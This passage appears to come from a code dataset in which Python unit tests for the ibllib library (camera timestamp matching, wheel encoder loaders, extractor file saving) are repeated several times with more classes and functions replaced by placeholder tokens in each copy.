expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n <function token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) 
->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 
13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = 
camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n <function token>\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = 
pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n 
np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n <function token>\n <function token>\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == 
audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] 
+ pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n 
